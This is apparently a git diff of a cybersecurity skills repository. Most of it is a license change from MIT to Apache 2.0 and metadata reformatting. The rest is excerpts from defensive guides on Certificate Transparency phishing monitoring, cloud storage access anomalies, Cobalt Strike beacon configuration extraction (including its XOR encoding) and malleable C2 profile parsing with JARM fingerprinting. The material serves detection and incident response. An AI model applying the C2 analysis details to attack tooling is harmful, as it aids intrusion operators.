      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,12 +1,62 @@
 ---
 name: analyzing-certificate-transparency-for-phishing
-description: Monitor Certificate Transparency logs using crt.sh and Certstream to detect phishing domains, lookalike certificates, and unauthorized certificate issuance targeting your organization.
+description: Monitor Certificate Transparency logs using crt.sh and Certstream to
  detect phishing domains, lookalike certificates, and unauthorized certificate issuance
  targeting your organization.
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [certificate-transparency, ct-logs, phishing, crt-sh, certstream, ssl, domain-monitoring, threat-intelligence]
+tags:
-version: "1.0"
+- certificate-transparency
 - ct-logs
 - phishing
 - crt-sh
 - certstream
 - ssl
 - domain-monitoring
 - threat-intelligence
 version: '1.0'
 author: mahipal
-license: MIT
+license: Apache-2.0
 atlas_techniques:
 - AML.T0052
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1583.001
 - T1583.004
 - T1566.002
 - T1608.005
 - T1596.003
 mitre_f3:
  version: '1.1'
  tactics:
  - resource-development
  - reconnaissance
  - initial-access
  techniques:
  - id: T1583.001
    name: 'Acquire Infrastructure: Domains'
    tactic: resource-development
    source: attack
  - id: F1020.002
    name: 'Create Fake Materials: Fake Website'
    tactic: resource-development
    source: f3
  - id: T1593
    name: Search Open Websites/Domains
    tactic: reconnaissance
    source: attack
  - id: T1598
    name: Phishing for Information
    tactic: reconnaissance
    source: attack
  - id: T1660
    name: Phishing
    tactic: initial-access
    source: attack
 ---
 # Analyzing Certificate Transparency for Phishing
@@ -14,6 +64,14 @@ license: MIT
 Certificate Transparency (CT) is an Internet security standard that creates a public, append-only log of all issued SSL/TLS certificates. Monitoring CT logs enables early detection of phishing domains that register certificates mimicking legitimate brands, unauthorized certificate issuance for owned domains, and certificate-based attack infrastructure. This skill covers querying CT logs via crt.sh, real-time monitoring with Certstream, building automated alerting for suspicious certificates, and integrating findings into threat intelligence workflows.
 ## When to Use
 - When investigating security incidents that require analyzing certificate transparency for phishing
 - When building detection rules or threat hunting queries for this domain
 - When SOC analysts need structured procedures for this analysis type
 - When validating security monitoring coverage for related attack techniques
 ## Prerequisites
 - Python 3.9+ with `requests`, `certstream`, `tldextract`, `Levenshtein` libraries
@@ -36,7 +94,7 @@ Attackers register lookalike domains and obtain free certificates (often from Le
 crt.sh is a free web interface and PostgreSQL database operated by Sectigo that indexes CT logs. It supports wildcard searches (`%.example.com`), direct SQL queries, and JSON API responses. It tracks certificate issuance, expiration, and revocation across all major CT logs.
-## Practical Steps
+## Workflow
 ### Step 1: Query crt.sh for Certificate History
@@ -6,10 +6,7 @@ certificates, and identifies potential phishing infrastructure.
 """
 import json
 import os
 import sys
 import re
 from datetime import datetime
 from collections import defaultdict
 try:
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,18 +1,61 @@
 ---
 name: analyzing-cloud-storage-access-patterns
-description: >-
+description: Detect abnormal access patterns in AWS S3, GCS, and Azure Blob Storage
-  Detect abnormal access patterns in AWS S3, GCS, and Azure Blob Storage by analyzing CloudTrail
+  by analyzing CloudTrail Data Events, GCS audit logs, and Azure Storage Analytics.
-  Data Events, GCS audit logs, and Azure Storage Analytics. Identifies after-hours bulk downloads,
+  Identifies after-hours bulk downloads, access from new IP addresses, unusual API
-  access from new IP addresses, unusual API calls (GetObject spikes), and potential data exfiltration
+  calls (GetObject spikes), and potential data exfiltration using statistical baselines
-  using statistical baselines and time-series anomaly detection.
+  and time-series anomaly detection.
 domain: cybersecurity
 subdomain: cloud-security
-tags: [analyzing, cloud, storage, access]
+tags:
-version: "1.0"
+- cloud-security
 - aws-s3
 - gcs
 - azure-blob-storage
 - cloudtrail
 - data-access-anomaly
 - exfiltration-detection
 version: '1.0'
 author: mahipal
-license: MIT
+license: Apache-2.0
 atlas_techniques:
 - AML.T0024
 - AML.T0056
 nist_ai_rmf:
 - MEASURE-2.7
 - MAP-5.1
 - MANAGE-2.4
 nist_csf:
 - PR.IR-01
 - ID.AM-08
 - GV.SC-06
 - DE.CM-01
 mitre_attack:
 - T1530
 - T1567.002
 - T1619
 - T1078.004
 - T1048
 ---
 # Analyzing Cloud Storage Access Patterns
 ## When to Use
 - When investigating security incidents that require analyzing cloud storage access patterns
 - When building detection rules or threat hunting queries for this domain
 - When SOC analysts need structured procedures for this analysis type
 - When validating security monitoring coverage for related attack techniques
 ## Prerequisites
 - Familiarity with cloud security concepts and tools
 - Access to a test or lab environment for safe execution
 - Python 3.8+ with required dependencies installed
 - Appropriate authorization for any testing activities
 ## Instructions
 1. Install dependencies: `pip install boto3 requests`
@@ -21,7 +21,7 @@ def query_cloudtrail_s3_events(bucket_name, hours_back=24):
        "--start-time", start_time,
        "--output", "json",
    ]
-    result = subprocess.run(cmd, capture_output=True, text=True)
+    result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
    if result.returncode != 0:
        logger.error("CloudTrail query failed: %s", result.stderr[:200])
        return []
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,12 +1,32 @@
 ---
 name: analyzing-cobalt-strike-beacon-configuration
-description: Extract and analyze Cobalt Strike beacon configuration from PE files and memory dumps to identify C2 infrastructure, malleable profiles, and operator tradecraft.
+description: Extract and analyze Cobalt Strike beacon configuration from PE files
  and memory dumps to identify C2 infrastructure, malleable profiles, and operator
  tradecraft.
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [cobalt-strike, beacon, c2, malware-analysis, config-extraction, threat-hunting, red-team-tools]
+tags:
-version: "1.0"
+- cobalt-strike
 - beacon
 - c2
 - malware-analysis
 - config-extraction
 - threat-hunting
 - red-team-tools
 version: '1.0'
 author: mahipal
-license: MIT
+license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1071.001
 - T1573.001
 - T1090.004
 - T1105
 - T1027
 ---
 # Analyzing Cobalt Strike Beacon Configuration
@@ -14,6 +34,14 @@ license: MIT
 Cobalt Strike is a commercial adversary simulation tool widely abused by threat actors for post-exploitation operations. Beacon payloads contain embedded configuration data that reveals C2 server addresses, communication protocols, sleep intervals, jitter values, malleable C2 profile settings, watermark identifiers, and encryption keys. Extracting this configuration from PE files, shellcode, or memory dumps is critical for incident responders to map attacker infrastructure and attribute campaigns. The beacon configuration is XOR-encoded using a single byte (0x69 for version 3, 0x2e for version 4) and stored in a Type-Length-Value (TLV) format within the .data section.
 ## When to Use
 - When investigating security incidents that require analyzing cobalt strike beacon configuration
 - When building detection rules or threat hunting queries for this domain
 - When SOC analysts need structured procedures for this analysis type
 - When validating security monitoring coverage for related attack techniques
 ## Prerequisites
 - Python 3.9+ with `dissect.cobaltstrike`, `pefile`, `yara-python`
@@ -37,7 +65,7 @@ The beacon configuration encodes the malleable C2 profile that dictates HTTP req
 Each Cobalt Strike license embeds a unique watermark (4-byte integer) into generated beacons. Extracting the watermark can link multiple beacons to the same operator or cracked license. Known watermark databases maintained by threat intelligence providers map watermarks to specific threat actors or leaked license keys.
-## Practical Steps
+## Workflow
 ### Step 1: Extract Configuration with CobaltStrikeParser
@@ -8,9 +8,7 @@ communication settings, malleable C2 profile details, and watermark values.
 import struct
 import os
 import sys
 import json
 import hashlib
 import re
 from collections import OrderedDict
 # Cobalt Strike beacon configuration field IDs (Type-Length-Value format)
@@ -1,21 +0,0 @@
 MIT License
 Copyright (c) 2025 Mahipal
 Permission is hereby granted, free of charge, to any person obtaining a copy
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
 The above copyright notice and this permission notice shall be included in all
 copies or substantial portions of the Software.
 THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
 SOFTWARE.
@@ -1,60 +0,0 @@
 ---
 name: analyzing-cobalt-strike-malleable-profiles
 description: >
  Parses Cobalt Strike malleable C2 profiles using pyMalleableC2 to extract beacon
  configuration, HTTP communication patterns, and sleep/jitter settings. Combines with
  JARM TLS fingerprinting to detect C2 servers on the network. Use when investigating
  suspected Cobalt Strike infrastructure or building detection signatures for C2 traffic.
 domain: cybersecurity
 subdomain: security-operations
 tags: [analyzing, cobalt, strike, malleable]
 version: "1.0"
 author: mahipal
 license: MIT
 ---
 # Analyzing Cobalt Strike Malleable Profiles
 ## Instructions
 Parse malleable C2 profiles to extract IOCs and detection opportunities using the
 pyMalleableC2 library. Combine with JARM fingerprinting to identify C2 servers.
 ```python
 from malleablec2 import Profile
 # Parse a malleable profile from file
 profile = Profile.from_file("amazon.profile")
 # Extract global options (sleep, jitter, user-agent)
 print(profile.ast.pretty())
 # Access HTTP-GET block URIs and headers for network signatures
 # Access HTTP-POST block for data exfiltration patterns
 # Generate JARM fingerprints for known C2 infrastructure
 ```
 Key analysis steps:
 1. Parse the malleable profile to extract HTTP-GET/POST URI patterns
 2. Extract User-Agent strings and custom headers for IDS signatures
 3. Identify sleep time and jitter for beaconing detection thresholds
 4. Scan suspect IPs with JARM to match known C2 fingerprint hashes
 5. Cross-reference extracted IOCs with network traffic logs
 ## Examples
 ```python
 # Parse profile and extract detection indicators
 from malleablec2 import Profile
 p = Profile.from_file("cobaltstrike.profile")
 print(p)  # Reconstructed source
 # JARM scan a suspect C2 server
 import subprocess
 result = subprocess.run(
    ["python3", "jarm.py", "suspect-server.com"],
    capture_output=True, text=True
 )
 print(result.stdout)
 # Compare fingerprint against known CS JARM hashes
 ```
@@ -1,69 +0,0 @@
 # API Reference: Analyzing Cobalt Strike Malleable Profiles
 ## pyMalleableC2
 ```python
 from malleablec2 import Profile
 from malleablec2.components import HttpGetBlock, HttpPostBlock, ClientBlock, ServerBlock
 # Parse from file or string
 p = Profile.from_file("amazon.profile")
 p = Profile.from_string(code_string)
 p = Profile.from_scratch()
 # Set global options
 p.set_option("sleeptime", "3000")
